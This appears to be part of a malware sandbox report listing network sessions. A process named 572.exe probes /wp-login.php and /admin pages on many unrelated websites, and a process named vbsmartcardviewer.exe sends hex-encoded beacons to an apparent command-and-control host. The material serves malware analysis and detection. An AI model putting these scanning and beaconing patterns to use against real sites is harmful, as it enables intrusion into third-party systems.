                                                                                                                                                                                                                                                                                                                                                                Data Raw: 32 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 53 6d 6f 9b 30 10 fe 2b 96 a5 f0 a9 34 36 af a1 8b 33 65 49 36 51 b5 20 a5 a9 d2 7d aa 1c 73 14 4f 60 28 38 69 f3 ef 67 42 33 a5 d2 b4 8f b3 c4 19 3f f6 73 be 7b ee 3c 2d 74 55 a2 4e 1f 4b 60 b8 00 f9 52 e8 1b 4a c8 08 cf a6 05 f0 6c 36 bd 5f 6d e6 28 99 df af 18 5e a7 df d2 cd 03 46 8b 34 d9 ac 92 0d c3 49 1a 27 cb d5 d3 15 4a d2 ef e9 dd 5d ba 35 ac 0a 34 47 8a 57 c6 5d 5e b7 15 d7 76 06 1a 84 96 b5 c2 48 d4 4a 83 d2 0c 6b 28 a1 29 6a 05 4c d5 9f 49 07 09 6f 4d dd ea 8b c3 52 49 2d 79 69 77 82 9b 28 e9 35 39 33 0a ad 1b 1b 5e f7 f2 c0 f0 93 fd 38 b7 17 75 d5 70 2d 77 25 5c d0 e3 15 83 ec 05 ae 44 d1 d6 e6 06 6a d8 9d 68 65 a3 91 3e 36 d0 c7 f2 ae c7 bf f8 81 0f 28 46 5d 2b 18 1e 3f c7 4a f0 a6 db 97 fc 79 0d 5d bd 6f 05 7c 7d d8 de c6 3f ef b6 73 16 d2 28 73 bd cc a5 62 02 2e 0f 20 c8 f3 3c f3 1c 3f 0f 81 b8 4e ee 9a 3b c6 83 3b f3 33 08 b9 ab b3 e3 59 e8 8a b7 2f 52 dd 90 e6 fd cb 67 cd 65 de 1a 15 90 cc fa 33 52 d9 c3 fa 5f 21 2d b6 8f cb e4 61 1e 33 cf 7a 97 2a af 19 9d d8 a1 13 52 2f 72 6d 32 72 48 62 86 99 d6 9b 91 33 a1 21 09 a9 7b b2 9e 67 40 67 e4 44 66 7a 35 5b fd d1 fe b3 e9 87 e9 37 da 9e e3 93 0b 64 17 18 f3 e8 5b 52 09 99 19 75 9f 4d a4 c4 8e bc 20 8c 48 10 44 01 75 bd 90 d0 c0 b1 c0 54 9d 39 c4 12 a7 98 f2 8f 41 1d 9f 5b 6d 73 c2 42 3f b2 4c 8d 14 37 2e dc 89 e3 91 88 12 ea 59 95 2e d8 8f d5 06 a3 53 e6 bb ba cd a0 65 04 bd c9 cc 6c e0 93 4c 68 d0 ec bc 1a c4 3c 63 46 d3 33 f4 c1 e9 91 d9 da b4 09 74 1a ed 55 b7 17 02 ba 2e df 97 d7 e8 8f 9e e8 9c 10 8a 97 37 e8 6f 19 4d c7 43 2d fe 43 f3 58 aa 63 ae 25 76 46 bf c8 9f 84 3e a1 0e 46 bc 3b 2a 71 d9 55 7d 3f f5 cd 65 de ef ec 37 26 f0 f8 52 c6 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 22fSmo0+463eI6Q }sO`(8igB3?s{<-tUNK`RJl6_m(^F4I'J]54GW]^vHJk()jLIoMRI-yiw(593^8up-w%\Djhe>6(F]+?Jy]o|}?s(sb. <?N;;3Y/Rge3R_!-a3z*R/rm2rHb3!{g@gDfz5[7d[RuM HDuT9A[msB?L7.Y.SelLh<cF3tU.7oMC-CXc%vF>F;*qU}?e7&R0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                318192.168.2.658286103.224.182.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.925381899 CET181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.079030991 CET170INHTTP/1.0 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                319192.168.2.65830296.7.224.17880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.925394058 CET173OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.036154985 CET628INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131707977_1611129006_213767433_15_9066_0_0_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 26 23 34 36 3b 70 68 70 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 30 37 26 23 34 36 3b 63 62 64 64 35 30 39 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131707&#46;cbdd509</BODY></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                320192.168.2.658301104.21.14.24580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.925411940 CET173OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.050595999 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z68UVnYT7amvJkaV8QNmUHQPrE1kIjwMRyjpK57PoYQIZDBEOk6aP7jTmidpCO9l49IgIUG874l1SI3D0qM6UgRVocG8VJc6N33PRsHkyHZnLk65sxCbre7aVKjL8CHamQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abbd6df6c0723-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 36 12 fe ee 5f 31 d1 01 89 0d 58 92 bd 6f 79 93 55 b4 bb 39 20 c0 1e ba ed 66 d1 2e 8a 45 40 91 23 8b 0d 45 ea 48 ca 8a 91 cb 7f 2f 28 4a 8e fc 92 f4 16 77 40 80 88 e2 f0 99 99 87 cf 8c 48 27 47 1f 7e 7e 7f f3 f5 d3 15 14 b6 14 e9 28 39 0a c3 3f 78 0e c2 c2 f5 15 9c 7e 4b 21 71 13 40 05 31 66 11 48 15 fe 69 80 e3 3b 50 82 71 0c 40 10 b9 5c 04 28 c3 2f 9f 83 14 92 a3 3f 50 32 9e 7f 0b c3 27 a8 0e 07 e0 30 d4 e9 f7 41 9d bd 00 75 f6 1d 50 4b db a1 b9 17 87 b2 dc 47 09 c3 6d a4 02 09 4b 47 89 e5 56 60 fa a3 b5 28 2d 57 12 7e c5 7f d7 5c 23 3b 82 ff c0 7b a1 6a 96 0b a2 31 89 bd dd 28 29 d1 12 a0 05 d1 06 ed 22 f8 72 f3 cf f0 2c 80 b8 9f 28 ac ad 42 87 b0 5a 04 ef 95 74 a0 e1 cd ba c2 00 a8 1f 2d 02 8b f7 36 76 f1 5e 6e 60 5e 42 f9 3d fc f2 63 f8 5e 95 15 b1 3c 13 43 a0 eb ab c5 15 5b e2 60 9d 24 25 2e 02 ad 32 65 cd c0 50 2a 2e 19 de 4f 41 aa 5c 09 a1 9a bd 25 2b 8e 4d a5 b4 1d 2c 6a 38 b3 c5 82 e1 8a 53 0c db c1 94 4b 6e 39 11 a1 a1 44 e0 62 ee 51 04 97 77 a0 51 2c 02 63 d7 02 4d 81 68 03 e0 6c 11 d0 fc d6 bf 0a a9 31 01 14 1a f3 45 10 53 26 43 ba e4 b1 9f 8a 69 1e a1 d6 4a 9b a8 35 8a 77 35 7c fe 2d 7d de c5 c9 93 0b 8e ce cb c9 df 7a e1 d8 3b da 56 43 6b 98 66 8a ad 1f 4a a2 97 5c 5e cc 2e 2b c2 18 97 cb 8b d9 63 e2 81 d2 d1 68 a0 40 74 f1 cd 67 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 47 92 ac f8 92 58 a5 23 aa d4 1d c7 2b 49 32 81 6c 02 0f 23 57 02 0d 97 4c 35 11 61 ec 6a 85 d2 7e e4 c6 a2 44 3d 3e f9 f0 f3 bf 3a e5 7c 54 84 21 3b 99 42 5e 4b da 8a 73 dc af 06 58 11 0d 1d b0 80 05 30 45 eb 12 a5 8d 96 68 af 04 ba c7 9f d6 d7 6c 7c e2 6d 42 22 50 db 93 c9 65 b7 ba 5f 19 b5 79 45 8c 9b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6c8Xmo6_1XoyU9 f.E@#EH/(Jw@H'G~~(9?x~K!q@1fHi;Pq@\(/?P2'0AuPKGmKGV`(-W~\#;{j1()"r,(BZt-6v^n`^B=c^<C[`$%.2eP*.OA\%+M,j8SKn9DbQwQ,cMhl1ES&CiJ5w5|-}z;VCkfJ\^.+ch@tgGW6GX#+I2l#WL5aj~D=>:|T!;B^KsX0Ehl|mB"Pe_yE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.050633907 CET1186INData Raw: 4a 90 35 2c e0 24 13 8a de 9d 78 bb c7 c9 08 e0 71 94 c4 7d 6a 7b 55 34 1a 25 71 57 48 8e 3b 97 7c c2 f8 aa db ff b0 d1 a4 aa 50 07 69 0b d7 ce 74 45 4a 73 1f 12 f4 0f 61 bb 41 6e d8 45 dc 8e 3b 25 0d 72 08 80 11 4b 42 ab 89 34 82 58 74 25 ee 88
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: J5,$xq}j{U4%qWH;|PitEJsaAnE;%rKB4Xt%F&H?$25Q3EzZMt[;M#jW^hiu)UY!dZ#dI\h:{ILEe-X~&@uN#$.^mHh)u8nEq#^#
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.050667048 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                321192.168.2.65830013.248.169.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.926975012 CET177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.158473969 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834cc-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_AGraqWJWq6mlj/sabUa92jaX52Ab7hWB4qhvAcvCi7qmUL3rrMsnYWzrZ/GiFk4YebYF6UExWkq7GSsjph0iDA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.365740061 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834cc-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_AGraqWJWq6mlj/sabUa92jaX52Ab7hWB4qhvAcvCi7qmUL3rrMsnYWzrZ/GiFk4YebYF6UExWkq7GSsjph0iDA
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                322192.168.2.658313185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:10.472826958 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:10.717425108 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                323192.168.2.658315185.51.191.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:14.819574118 CET179OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:15.036694050 CET540INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                Expires: Wed, 06 Mar 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 246
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://innovationdevelopment.eu/admin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                324192.168.2.658316181.4.228.15580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:14.819706917 CET182OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ventas.officeinsumos.com.ar
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:15.093442917 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/7.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
